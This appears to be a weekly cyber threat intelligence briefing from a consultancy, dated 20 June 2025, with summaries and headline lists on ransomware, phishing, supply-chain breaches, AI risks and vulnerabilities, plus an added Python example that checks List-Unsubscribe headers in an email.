SecurityScorecard Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
Supply Chain Attack Hits Swiss Banks | SC Media UK
M&S and Co-op Hacks Classified as Single Cyber Event - Infosecurity Magazine
Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to $592M in Damages
Most organisations are at risk thanks to immature supply chain security | TechRadar
M&S cyber attack deepens as tech partner TCS denies blame - Retail Gazette
MSPs Juggle High Breach Rates and Strong Cyber Confidence | MSSP Alert
Security pro counts the cost of Microsoft dependency • The Register
Critical Open VSX Registry Flaw Exposes Millions of Developers to Supply Chain Attacks
Why Are CISOs Prioritizing Snowflake Security? The Breach Playbook Has Changed. - Security Boulevard
Officials set out cyber security charter for NHS suppliers | UKAuthority
Cloud/SaaS
Most AI and SaaS apps are outside IT's control - Help Net Security
The Hidden Risks of SaaS: Why Built-In Protections Aren't Enough for Modern Data Resilience
Why Are CISOs Prioritizing Snowflake Security? The Breach Playbook Has Changed. - Security Boulevard
Hackers abuse Microsoft ClickOnce and AWS services for stealthy attacks
When the Cloud Goes Down, Will Your Security Go With It? | Symantec Enterprise Blogs
Outages
UK mobile telco Three suffers voice, text outage • The Register
Encryption
China breaks RSA encryption with a quantum computer - Earth.com
Quantum risk is already changing cyber security - Help Net Security
Home Office anti-encryption site pushes payday loan scheme • The Register
Linux and Open Source
Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security
Linux flaws chain allows Root access across major distributions
French city of Lyon ditching Microsoft for FOSS • The Register
Passwords, Credential Stuffing & Brute Force Attacks
Heard about the 16 billion passwords leak? Here are the facts and how to protect yourself | ZDNET
Cyber criminals cash in on stolen cookies and credentials | Insurance Business America
Brother printer bug in 689 models exposes default admin passwords
Social Media
Regulations, Fines and Legislation
Home Office anti-encryption site pushes payday loan scheme • The Register
How to Keep Up with Overlapping Cyber Security Regulations in Finance - Infosecurity Magazine
Top Pentagon spy pick rejected by White House - POLITICO
WhatsApp messaging app banned on all US House of Representatives devices | WhatsApp | The Guardian
CISA Is Shrinking: What Does It Mean for Cyber?
Foreign aircraft, domestic risks | CSO Online
Models, Frameworks and Standards
New Cyber Blueprint to Scale Up the EU Cyber Security Crisis Management | ENISA
Careers, Working in Cyber and Information Security
Why work-life balance in cyber security must start with executive support - Help Net Security
Getting a career in cyber security isn’t easy, but this can help
UK Gov Cyber Security Jobs Average Salary is Under £45,000, Study Finds - Infosecurity Magazine
Charming Kitten APT Tries Spying on Israeli Cyber Experts
Law Enforcement Action and Take Downs
Man Who Hacked Organisations to Advertise Security Services Pleads Guilty - SecurityWeek
British Man Suspected of Being the Hacker IntelBroker Arrested, Charged - SecurityWeek
20,000 Malicious IPs And Domains Taken Down In INTERPOL Infostealer Crackdown – Eurasia Review
Four REvil ransomware crooks walk free after admitting guilt • The Register
Hacker 'IntelBroker' charged in US for global data theft breaches
Indian police arrest 10 for laundering fraud proceeds for a Chinese gang | Cryptopolitan
Misinformation, Disinformation and Propaganda
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
How Cyber Warfare Changes the Face of Geopolitical Conflict
How Geopolitical Tensions Are Shaping Cyber Warfare
Cyber warfare escalates: Israel and Iran's digital conflict
Nation State Actors
How Cyber Warfare Changes the Face of Geopolitical Conflict
Are we making hackers sound too cool? These security experts think so | TechRadar
Decade of risk: signaling security in an era of geopolitical tension - DCD
China
Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security
China breaks RSA encryption with a quantum computer - Earth.com
Chinese APT Hacking Routers to Build Espionage Infrastructure - SecurityWeek
China-linked APT Salt Typhoon targets Canadian Telecom companies
Indian police arrest 10 for laundering fraud proceeds for a Chinese gang | Cryptopolitan
Former US Army Sergeant admits he sold secrets to China • The Register
China increases cyber attacks on hospitals to ‘humiliate’ Taiwan
Russia
APT28 hackers use Signal chats to launch new malware attacks on Ukraine
XDigo Malware Exploits Windows LNK Flaw in Eastern European Government Attacks
Cyber attacks on state bodies: a multi-level interaction scheme via Word and Signal revealed | УНН
Iran
Cyber warfare escalates: Israel and Iran's digital conflict
Israel urges citizens to turn off home cameras as Iran hacks surveillance systems | TechSpot
The real threat to the UK from Iran - from sleeper cells to cyber attacks
Israel expands cyber powers amid rising threats—via WhatsApp | Ctech
Tools and Controls
Most AI and SaaS apps are outside IT's control - Help Net Security
Are we making hackers sound too cool? These security experts think so | TechRadar
The Hidden Risks of SaaS: Why Built-In Protections Aren't Enough for Modern Data Resilience
When the Cloud Goes Down, Will Your Security Go With It? | Symantec Enterprise Blogs
And Now Malware That Tells AI to Ignore It?
AI Agents Are Getting Better at Writing Code—and Hacking It as Well | WIRED
Half of Security Pros Want GenAI Deployment Pause - Infosecurity Magazine
Microsoft rolls out Windows security changes to prevent another CrowdStrike meltdown | ZDNET
Don’t be distracted by AI – fundamental cyber skills are still key | TechRadar
Bring Your Own Installer EDR Bypass Observed in Ransomware Operation | MSSP Alert
What is Risk Avoidance? | Definition from TechTarget
How CISOs can justify security investments in financial terms - Help Net Security
How Executives Could Respond When Faced With Multiple Crisis Situations
Other News
BT says nearly half small businesses have suffered a cyber attack in the last year
Microsoft rolls out Windows security changes to prevent another CrowdStrike meltdown | ZDNET
Services disrupted as cyber attack hits Glasgow Council - UKTN
Cyber attacks on insurers put CFOs on high alert | Fortune
EU and Australia commit to Defence Partnership| Cybernews
Building cyber resilience in the financial sector
Decade of risk: signaling security in an era of geopolitical tension - DCD
Medical device cyber attacks push hospitals into crisis mode - Help Net Security
Cyber Intel Pros and Hobbyists Can Now Report Threats Anonymously - Infosecurity Magazine
French city of Lyon ditching Microsoft for FOSS • The Register
Security pro counts the cost of Microsoft dependency • The Register
Some European Countries Are Ditching Microsoft Software For Good (And Here's Why That Matters)
Denmark is switching to Linux | PC Gamer
Dual-Use Military and Civil Airports Face Cyber Threats
The Security Fallout of Cyber Attacks on Government Agencies - Security Boulevard
Cyber Skills Today for Economic Growth Tomorrow
Vulnerability Management
'7% of organisations tackle vulnerabilities only when necessary' - Data Centre & Network News
CISA Is Shrinking: What Does It Mean for Cyber?
Irish businesses show gaps in cyber security as 6 in 10 overlook regular software updates
Vulnerabilities
Critical Citrix NetScaler bug fixed, upgrade ASAP! (CVE-2025-5777) - Help Net Security
Up next on the KEV? All signs point to 'CitrixBleed 2' • The Register
Critical RCE Flaws in Cisco ISE and ISE-PIC Allow Unauthenticated Attackers to Gain Root Access
Linux flaws chain allows Root access across major distributions
Threat Actor Allegedly Selling FortiGate API Exploit Tool Targeting FortiOS
Hundreds of MCP Servers at Risk of RCE and Data Leaks - Infosecurity Magazine
Asana Fixes Security Flaw in AI Data Integration Tool
Chrome 138, Firefox 140 Patch Multiple Vulnerabilities - SecurityWeek
Millions of Brother Printers Hit by Critical Unpatchable Bug
CISA Adds 3 Flaws to KEV Catalog, Impacting AMI MegaRAC, D-Link, Fortinet
Critical Open VSX Registry Flaw Exposes Millions of Developers to Supply Chain Attacks
WinRAR patches bug letting malware launch from extracted archives
Critical Teleport Vulnerability Let Attackers Remotely Bypass Authentication Controls
Flaw in Notepad++ installer could grant attackers SYSTEM access (CVE-2025-49144) - Help Net Security
Motors Theme Vulnerability Exploited to Hack WordPress Websites - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 20 June 2025
Black Arrow Cyber Threat Intelligence Briefing 20 June 2025:
-Survey Reveals 98% of CISOs Anticipate Increased Cyber Attacks Within Three Years
-Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals
-IT Helpdesk Scams are Ramping Up – Here’s What Leaders Can Do
-Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
-Why CISOs Must Align Business Objectives and Cyber Security
-Scattered Spider has Moved from Retail to Financial Services, Insurance Now Targeted
-Ransomware Thrives in Shook-Up Criminal Underworld
-Russian Gang’s Cyber Attack on UK Blood Services ‘Harmed 170 Patients’
-Experts Warn Clicking "Unsubscribe" Could Actually be a Security Risk, Here's Why
-Security Is Only as Strong as the Weakest Third-Party Link
-Employees Are Using AI Where They Know They Shouldn’t
-Threat of Cyber Attacks from Iran Concern Security Experts
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
Our review of cyber security in specialist and general media this week features a survey of 300 CISOs in which 98% expect increased cyber threats within three years, with growing concern over third-party risks and hybrid outsourcing models. A separate survey revealed that 69% of managed service providers (MSPs) reported multiple cyber breaches in the last 12 months, highlighting supply chain risks that organisations must manage, including the popular attack tactic of IT helpdesk scams. We also report on the evolution of phishing using agentic AI and deepfakes, and the use of ‘unsubscribe’ buttons in phishing emails to compromise the recipient’s systems.
The structure and tactics of the criminal ecosystem continue to evolve. New attacker groups are emerging as others disappear, and existing groups are moving from the retail sector to target financial services, while Iranian cyber attackers are coming to the fore. We also report on the need for CISOs to demonstrate board-level alignment of security and business growth, and the need for stronger governance over the use of AI in organisations.
At Black Arrow Cyber Consulting, we strongly believe these developing risks are best addressed through an organisational-wide approach to security. In line with globally respected frameworks, this starts with governance by a leadership team that has a strong understanding of the fundamentals of cyber security using controls across people, operations and technology to address the evolving risks including social engineering, third party risks, and AI.
Top Cyber Stories of the Last Week
Survey Reveals 98% of CISOs Anticipate Increased Cyber Attacks Within Three Years
CSC’s latest global survey of 300 CISOs found that 70% believe security threats will increase in the next year and almost all (98%) predict an increase in the next three years. The study also highlights a rise in cyber security budgets and growing reliance on hybrid outsourcing models, though concerns remain over third-party access and poor compliance by domain providers.
https://www.techmonitor.ai/technology/cybersecurity/csc-survey-cisos-anticipate-cyberattacks
Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals
CyberSmart’s latest survey reveals that managed service providers (MSPs) remain a key target for cyber criminals, citing recent examples of organisations being attacked through their MSP. 69% of MSP participants reported multiple breaches in the last 12 months, with almost half facing three or more. 39% felt prepared to offer a solution or guidance to customers in meeting their cyber security regulations, which could include DORA or NIS2. The report notes opportunities to further strengthen cyber resilience. MSPs named continuous monitoring, employee cyber security training, and proactive risk management as the measures most likely to help them improve cyber confidence.
https://www.itsecurityguru.org/2025/06/19/over-two-thirds-of-msps-hit-by-multiple-breaches-in-past-year-survey-reveals/
IT Helpdesk Scams are Ramping Up – Here’s What Leaders Can Do
IT helpdesk scams are becoming more sophisticated, targeting staff across legal, financial and other high-value sectors. Attackers often pose as internal IT support to trick users into installing legitimate remote access tools, giving criminals control of systems. Recent breaches at retailers M&S and the Co-op highlight how even trained IT staff can be manipulated. Criminal groups and state actors alike are adopting these tactics, increasingly enhanced by artificial intelligence to personalise interactions and build trust. With technical controls often bypassed, firms must invest in regular user training, restrict admin rights, and block unauthorised remote access tools to reduce risk.
https://www.itpro.com/security/cyber-attacks/it-helpdesk-scams-are-ramping-up-heres-what-to-do
Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
Phishing is entering a new phase, with AI-driven threats set to challenge traditional defences. Known as Phishing 3.0, this wave combines highly convincing deepfakes and autonomous AI agents capable of executing entire campaigns without human input. These tools can convincingly mimic voices or faces of trusted individuals, increasing the risk of fraud and data loss. A recent study found that current defences miss over two-thirds of phishing emails. To remain resilient, organisations must invest in advanced AI-powered detection and raise staff awareness to spot fake communications that appear authentic and urgent. The threat is growing rapidly, and preparation is essential.
Why CISOs Must Align Business Objectives and Cyber Security
A successful chief information security officer (CISO) must align cyber security with business objectives to support growth, innovation and resilience. As cyber threats grow more complex, including silent long-term intrusions and AI-driven attacks, CISOs must take a proactive approach that secures operations without hindering them. This requires board-level engagement, clarity over roles and responsibilities, and regular communication with other executives. Shared ownership of cyber risk across leadership teams fosters a culture where business and security priorities work in tandem. Simulations, modern tools, and well-structured processes further help ensure the organisation is prepared before a major incident occurs.
Scattered Spider has Moved from Retail to Financial Services, Insurance Now Targeted
The cyber crime group known as Scattered Spider has shifted its focus from retailers to the insurance sector, prompting warnings from Google for firms to be on high alert. Several US insurers, including Erie and Philadelphia Insurance, have reported system outages linked to unauthorised access, with investigations still ongoing. The group is known for using fake helpdesk calls to gain access before deploying ransomware. Google recommends enhanced caller verification, stronger authentication methods, and helpdesk training to reduce the risk. The prolonged disruption highlights the need for robust cyber security defences across the financial and insurance sectors.
https://www.theregister.com/2025/06/16/scattered_spider_targets_insurance_firms/
Ransomware Thrives in Shook-Up Criminal Underworld
The ransomware threat landscape is evolving rapidly, with a wave of new groups emerging as older operations disappear. A recent surge in attacks linked to groups such as SafePay, Qilin, Play and Akira accounted for 64 victims in May alone, with organisations in the UK, US, and Europe among those affected. The collapse of major players like RansomHub has triggered fierce competition among criminal groups, leading to greater fragmentation and more sophisticated tactics. Some attacks now appear to serve dual purposes, including espionage. Meanwhile, code reuse from defunct groups like REvil shows that while names may change, the threat remains constant.
https://www.govinfosecurity.com/ransomware-thrives-in-shook-up-criminal-underworld-a-28739
Russian Gang’s Cyber Attack on UK Blood Services ‘Harmed 170 Patients’
A ransomware cyber attack carried out by a Russian criminal group last year severely disrupted pathology services at London hospitals and GP surgeries, directly impacting patient care. The incident, which targeted the provider Synnovis, led to the cancellation of over 10,000 medical appointments and halted blood testing across many GP practices. Reports now confirm that nearly 600 incidents were linked to the disruption, with 170 patients suffering direct harm. These included one case of severe harm and 14 of moderate harm. The attack highlights the real-world consequences of digital vulnerabilities in critical healthcare systems.
https://www.lbc.co.uk/tech/russian-gangs-cyber-attack-on-blood-services-harmed-170-patients/
Experts Warn Clicking "Unsubscribe" Could Actually be a Security Risk, Here's Why
Clicking “unsubscribe” in spam emails may expose users to cyber attacks, experts warn. Threat actors often use these buttons to redirect recipients to harmful websites or confirm active email addresses for future targeting. Research suggests around 1 in 600 clicks lead to malicious content. If the sender is unfamiliar or untrusted, using the unsubscribe option is not advised. Instead, users should rely on built-in unsubscribe features within their email client, use spam filters, or create disposable email addresses to minimise risk. This highlights the need for caution when managing unwanted emails, even in seemingly routine actions.
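The advice above to prefer the email client's own unsubscribe feature rests on a mechanism that is not in the article: mail providers build that button from the List-Unsubscribe header (RFC 2369) and, where the sender also sets List-Unsubscribe-Post: List-Unsubscribe=One-Click (RFC 8058), can unsubscribe with a POST that never takes the user to a web page. The following Python is an added example, not code from the briefing or the article it summarises; the sample message, the function names and the domain-matching rule are constructed for illustration. It shows what a client sees in the headers and why a link in the body that points off the sender's domain deserves suspicion.

```python
"""Inspect the List-Unsubscribe machinery a mail client uses for its built-in
unsubscribe button, and contrast it with links found in the message body.

Added example, not from the briefing. The message below is constructed.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample message: header-based unsubscribe targets sit on the
# sender's domain, while the body link points at an unrelated domain.
SAMPLE_MESSAGE = """\
From: Newsletter <news@example.com>
To: user@example.net
Subject: Weekly update
List-Unsubscribe: <https://lists.example.com/unsub?id=abc123>, <mailto:unsub@example.com?subject=unsubscribe>
List-Unsubscribe-Post: List-Unsubscribe=One-Click
Content-Type: text/plain; charset=us-ascii

Thanks for reading. To stop these emails click:
http://unsubscribe-now.example.org/u/abc123
"""

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def _same_org(host, sender_domain):
    """Constructed heuristic: host is the sender domain or a subdomain of it."""
    host = (host or "").lower()
    return host == sender_domain or host.endswith("." + sender_domain)


def assess_unsubscribe(raw_message):
    """Return what a client can learn from the headers versus the body links."""
    msg = message_from_string(raw_message)
    sender_domain = parseaddr(msg.get("From", ""))[1].rsplit("@", 1)[-1].lower()

    # RFC 2369: comma-separated list of <URI> targets; https and mailto are common.
    targets = re.findall(r"<([^>]+)>", msg.get("List-Unsubscribe", ""))
    header_https = [t for t in targets if t.lower().startswith("https://")]
    header_mailto = [t for t in targets if t.lower().startswith("mailto:")]

    # RFC 8058 one-click: the POST header plus exactly one https target.
    post_header = msg.get("List-Unsubscribe-Post", "").strip().lower()
    one_click = post_header == "list-unsubscribe=one-click" and len(header_https) == 1

    header_on_sender_domain = all(
        _same_org(urlparse(u).hostname, sender_domain) for u in header_https
    )

    # Body links are whatever the sender chose to write; compare them to the sender.
    body = msg.get_payload(decode=True).decode("utf-8", "replace")
    body_links_off_domain = [
        u for u in URL_RE.findall(body)
        if not _same_org(urlparse(u).hostname, sender_domain)
    ]

    return {
        "sender_domain": sender_domain,
        "header_https": header_https,
        "header_mailto": header_mailto,
        "one_click": one_click,
        "header_on_sender_domain": header_on_sender_domain,
        "body_links_off_domain": body_links_off_domain,
    }


if __name__ == "__main__":
    for key, value in assess_unsubscribe(SAMPLE_MESSAGE).items():
        print(f"{key}: {value}")
```

Run against the constructed message, the header targets stay on example.com and one-click is available, so the client can act without opening anything; the only link that leaves the sender's domain is the one in the body, which is exactly the link the article warns against clicking.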
Security Is Only as Strong as the Weakest Third-Party Link
Third-party risks are now a major contributor to data breaches, accounting for 30% of incidents. High-profile incidents have shown how supplier vulnerabilities can disrupt operations at scale. To remain resilient, security leaders must shift to continuous monitoring and treat third-party risks as their own. With rising complexity and resource constraints, technology and smarter assessments are vital to protecting businesses in an increasingly interconnected environment.
https://www.darkreading.com/vulnerabilities-threats/security-strong-weakest-third-party-link
Employees Are Using AI Where They Know They Shouldn’t
Many employees are using artificial intelligence tools in ways they know they shouldn’t, including for sensitive tasks such as safety decisions and personnel matters. Despite this, 86% of staff lack confidence in AI’s accuracy, and most feel undertrained in its practical use. Smaller firms in particular struggle with adoption, with nearly half of employees unsure how to use AI effectively. Business leaders should take urgent steps to improve staff training, introduce clear and enforceable AI policies, and avoid deploying tools without defined purpose or oversight, as failure to do so risks both misuse and missed productivity gains.
https://www.helpnetsecurity.com/2025/06/18/employees-ai-potential/
Threat of Cyber Attacks from Iran Concern Security Experts
Cyber security experts are warning of a heightened threat of cyber attacks linked to Iran, particularly in light of ongoing regional tensions. Sectors such as energy, finance and transport are viewed as high-risk due to their potential for widespread disruption. Experts have noted the use of advanced phishing techniques and malware targeting critical systems, including those controlling fuel supplies and public infrastructure. Activity from both state-sponsored and sympathetic groups has increased, with dormant hacking groups resurfacing and issuing threats. Businesses are advised to strengthen defences and report suspicious activity, especially where remote access or unpatched systems are involved.
https://www.washingtontimes.com/news/2025/jun/18/cyber-pros-warn-digital-threats-spreading-iran/
Governance, Risk and Compliance
Survey reveals 98% of CISOs anticipate increased cyber attacks within three years – Tech Monitor
Why CISOs Must Align Business Objectives & Cyber Security
Cyber Security Strategy Shifts Amid Global Political Tensions
How to Break the Security Theater Illusion
Bridging the Gap Between CEOs and CISOs for AI Adoption | MSSP Alert
What is a compliance audit? (with an example checklist) | TechTarget
Security Is Only as Strong as the Weakest Third-Party Link
Security Evolution: From Pothole Repair to Road Building
Choosing a Clear Direction in the Face of Growing Cyber Security Demands - SecurityWeek
7 trends shaping digital transformation in 2025 - and AI looms large | ZDNET
How C-suite roles are shaping the future of tech leadership - Help Net Security
15 Emerging Cyber Security Threats and How to Prepare - DevX
Changing nature of cyber threat leads to ‘brittle’ risk landscape - Insurance Post
Threats
Ransomware, Extortion and Destructive Attacks
Scattered Spider Using Aggressive Social Engineering Techniques to Deceive IT Support Teams
IT helpdesk scams are ramping up – here’s what leaders can do | IT Pro
Ransomware Gangs Exploit Unpatched SimpleHelp Flaws to Target Victims with Double Extortion
Scattered Spider targets insurance firms, Google warns • The Register
Hackers switch to targeting US insurance companies
Ransomware Thrives in Shook-Up Criminal Underworld
Qilin Ransomware Emerges as World's Top Threat, Demands $50 Million Ransom
Fog ransomware attacks use employee monitoring tool to break into business networks | TechRadar
How cyber insurers are adapting to the new ransomware playbook | Insurance Business America
Anubis ransomware adds wiper to destroy files beyond recovery
Ransomware Group Qilin Offers Legal Counsel to Affiliates - Infosecurity Magazine
Ransomware gang busted in Thailand hotel raid
Don’t Get Caught in Scattered Spider’s Web | McCarter & English, LLP - JDSupra
Ransomware 3.0: A Glimpse Into the Post-Trust Ecosystem
Bert Ransomware: What You Need To Know | Fortra
Cyber attack purportedly compromises Scania’s corporate insurance subsidiary | SC Media
Ryuk ransomware’s initial access expert extradited to the US
Ransomware Victims
Russian gang’s cyber attack on blood services ‘harmed 170 patients’ - LBC
Victoria’s Secret restores critical systems after cyber attack
Freedman HealthCare targeted by cyber extortionists • The Register
Cyber attack pushes German napkin company into insolvency – DataBreaches.Net
2 Insurers Say Ongoing Outages Are Not Caused by Ransomware
Phishing & Email Based Attacks
Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
ChainLink Phishing: How Trusted Domains Become Threat Vectors
Why You Should Think Twice Before You Click ‘Unsubscribe’ in an Email - WSJ
Researcher shows how Android notifications can be a phisher's gold mine
Phishing goes prime time: Hackers use trusted sites to hijack search rankings | CSO Online
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
MailerLite warns of phishing campaign • Graham Cluley
Microsoft 365 security in the spotlight after Washington Post hack - Neowin
Washington Post email breach under probe | Cybernews
Other Social Engineering
Scattered Spider Using Aggressive Social Engineering Techniques to Deceive IT Support Teams
IT helpdesk scams are ramping up – here’s what leaders can do | IT Pro
North Korean hackers deepfake execs in Zoom call to spread Mac malware
Researcher shows how Android notifications can be a phisher's gold mine
Virtual kidnapping scams prey on our worst fears - Help Net Security
Why Are Cyber Criminals Targeting Law Firms With Voice Phishing? | Law.com
US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network
New ClickFix Malware Variant ‘LightPerlGirl’ Targets Users in Stealthy Hack - SecurityWeek
Fraud, Scams and Financial Crime
Brits Lose £106m to Romance Fraud in a Year - Infosecurity Magazine
Why You Should Think Twice Before You Click ‘Unsubscribe’ in an Email - WSJ
US recovers $225 million of crypto stolen in investment scams
Scammers hijack real support pages to show fake phone numbers | TechSpot
Paddle settles for $5 million over facilitating tech support scams
Krispy Kreme Data Breach Puts Employees at Risk of Financial Fraud - Infosecurity Magazine
Artificial Intelligence
North Korean hackers deepfake execs in Zoom call to spread Mac malware
Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
Employees are using AI where they know they shouldn’t - Help Net Security
Bridging the Gap Between CEOs and CISOs for AI Adoption | MSSP Alert
China’s Spy Agencies Are Investing Heavily in AI, Researchers Say - The New York Times
NCSC sounds warning over AI threat to critical national infrastructure | UKAuthority
As Geopolitical Tensions Rise AI Is Amplifying the Threat of Global Cyberwarfare
Who's guarding the AI? Even security teams are bypassing oversight - Help Net Security
M365 Copilot: New Zero-Click AI Flaw Allows Corporate Data Theft - Infosecurity Magazine
Why CISOs need to understand the AI tech stack - Help Net Security
CISOs flag gaps in GenAI strategy, skills, and infrastructure - Help Net Security
7 trends shaping digital transformation in 2025 - and AI looms large | ZDNET
Before scaling GenAI, map your LLM usage and risk zones - Help Net Security
LLM agents flunk CRM and confidentiality tasks • The Register
Stop Anthropomorphizing AI and Secure It Like Software
How CISOs Can Govern AI & Meet Evolving Regulations
Mitigating AI Threats: Bridging the Gap Between AI and Legacy Security - SecurityWeek
Researchers Warn of AI Attacks After PoC Exploits Atlassian's AI Agent - Infosecurity Magazine
Malware attack disguises itself as DeepSeek installer • Graham Cluley
2FA/MFA
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
Why SMS two-factor authentication codes aren't safe and what to use instead | ZDNET
Malware
North Korean hackers deepfake execs in Zoom call to spread Mac malware
Malware attack disguises itself as DeepSeek installer • Graham Cluley
New ClickFix Malware Variant ‘LightPerlGirl’ Targets Users in Stealthy Hack - SecurityWeek
Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month
Threat Actors Target Victims with HijackLoader and DeerStealer - Infosecurity Magazine
Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop
Google Chrome Zero-Day CVE-2025-2783 Exploited by TaxOff to Deploy Trinper Backdoor
Threat Actors Attacking Windows System With New Winos 4.0 Malware
Sneaky Serpentine#Cloud slithers through Cloudflare tunnels • The Register
Banana Squad’s Stealthy GitHub Malware Campaign Targets Devs - Infosecurity Magazine
New Campaigns Distribute Malware via Open Source Hacking Tools - SecurityWeek
North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine
Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets
Malicious Chimera Turns Larcenous on Python Index
Security Bite: Infostealer malware spikes 28% among Mac users, says Jamf - 9to5Mac
'Water Curse' Targets Infosec Pros via Poisoned GitHub Repos
Bots/Botnets
Hackers Exploit Langflow Flaw to Unleash Flodrix Botnet
Mobile
Researcher shows how Android notifications can be a phisher's gold mine
Godfather Android malware now uses virtualization to hijack banking apps
New Android Malware Surge Hits Devices via Overlays, Virtualization Fraud and NFC Theft
Denial of Service/DoS/DDoS
Protecting Against Origin Server DDoS Attacks - Security Boulevard
Internet of Things – IoT
Thieves don't need your car keys, just a wireless signal - Help Net Security
SinoTrack GPS vulnerabilities may allow attackers to track, control vehicles - Help Net Security
Data Breaches/Leaks
The 20 biggest data breaches of the 21st century | CSO Online
UBS Employee Data Reportedly Exposed in Third Party Attack - Infosecurity Magazine
GCHQ intern who took secret data home jailed - BBC News
FCA warned four staffers who pocketed regulator data • The Register
UK fines 23andMe for ‘profoundly damaging’ breach exposing genetics data
Cartier Data Breach: Luxury Retailer Warns Customers That Personal Data Was Exposed - SecurityWeek
Telecom giant Viasat breached by China's Salt Typhoon hackers
No, the 16 billion credentials leak is not a new data breach
Hackers Access Legacy Systems in Oxford City Council Cyber Attack - SecurityWeek
Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals - IT Security Guru
MSPs remain confident over security | Microscope
Freedman HealthCare targeted by cyber extortionists • The Register
CCC breach exposes 9M Americans, hackers claim | Cybernews
Krispy Kreme Data Breach Puts Employees at Risk of Financial Fraud - Infosecurity Magazine
Microsoft 365 security in the spotlight after Washington Post hack - Neowin
Paraguay Suffered Data Breach: 7.4 Million Citizen Records Leaked on Dark Web
Zoomcar discloses security breach impacting 8.4 million users
240,000 Impacted by Data Breach at Eyecare Tech Firm Ocuco - SecurityWeek
Data Breach at Healthcare Services Firm Episource Impacts 5.4 Million People - SecurityWeek
Hacker steals 1 million Cock.li user records in webmail data breach
Ex-CIA Analyst Sentenced to 37 Months for Leaking Top Secret National Defence Documents
Organised Crime & Criminal Actors
Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop
Dutch police identify users as young as 11-year-old on Cracked.io hacking forum
Dutch police identify 126 Cracked.io users | Cybernews
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Pro-Israel hackers hit Iran's Nobitex exchange, burn $90M in crypto
North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine
Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets
US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network
Insurance
How cyber insurers are adapting to the new ransomware playbook | Insurance Business America
Changing nature of cyber threat leads to ‘brittle’ risk landscape - Insurance Post
Supply Chain and Third Parties
UBS Employee Data Reportedly Exposed in Third Party Attack - Infosecurity Magazine
ChainLink Phishing: How Trusted Domains Become Threat Vectors
Security Is Only as Strong as the Weakest Third-Party Link
'Water Curse' Targets Infosec Pros via Poisoned GitHub Repos
Cloud/SaaS
M365 Copilot: New Zero-Click AI Flaw Allows Corporate Data Theft - Infosecurity Magazine
Threat Actor Abuses TeamFiltration for Entra ID Attacks
Google links massive cloud outage to API management issue
Why Denmark is dumping Microsoft Office and Windows for LibreOffice and Linux | ZDNET
German state ditches Microsoft for open-source software - NZ Herald
Microsoft 365 security in the spotlight after Washington Post hack - Neowin
Sneaky Serpentine#Cloud slithers through Cloudflare tunnels • The Register
Outages
Google links massive cloud outage to API management issue
2 Insurers Say Ongoing Outages Are Not Caused by Ransomware
Encryption
Encryption Backdoors: The Security Practitioners’ View - SecurityWeek
Linux and Open Source
Why Denmark is dumping Microsoft Office and Windows for LibreOffice and Linux | ZDNET
German state ditches Microsoft for open-source software - NZ Herald
CISA Warns of Active Exploitation of Linux Kernel Privilege Escalation Vulnerability
New Linux Flaws Enable Full Root Access via PAM and Udisks Across Major Distributions
Passwords, Credential Stuffing & Brute Force Attacks
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
North Korean APT Hackers Attacking Ukrainian Government Agencies to Steal Login Credentials
Social Media
Ofcom investigates 4chan for not protecting users from illegal content • Graham Cluley
Trump administration set to again waive TikTok ban • The Register
Meta Starts Showing Ads on WhatsApp After 6-Year Delay From 2018 Announcement
Regulations, Fines and Legislation
Ofcom investigates 4chan for not protecting users from illegal content • Graham Cluley
How CISOs Can Govern AI & Meet Evolving Regulations
Cyber security takes a big hit in new Trump executive order - Ars Technica
Trump administration set to again waive TikTok ban • The Register
SEC withdraws cyber rules for investment companies, advisers | CyberScoop
